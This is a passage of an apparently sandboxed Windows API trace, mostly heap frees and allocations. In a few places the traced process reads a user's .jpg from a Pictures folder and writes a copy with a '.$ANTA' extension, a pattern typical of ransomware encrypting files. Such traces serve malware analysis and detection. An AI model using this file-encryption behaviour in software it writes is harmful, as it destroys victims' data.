hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.245] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0093.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0093.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.247] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0093.248] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0093.248] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\aslbgf0hcr8rp.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0093.248] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.248] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.248] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0093.249] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.249] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\aslbgf0hcr8rp.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.250] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0093.250] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.253] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0093.253] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0093.255] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xcae, lpOverlapped=0x0) returned 1 [0093.255] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0093.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10cae) returned 0x4516010 [0093.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10cae) returned 0x4526cc8 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.258] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10cae) returned 0x4516010 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.258] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 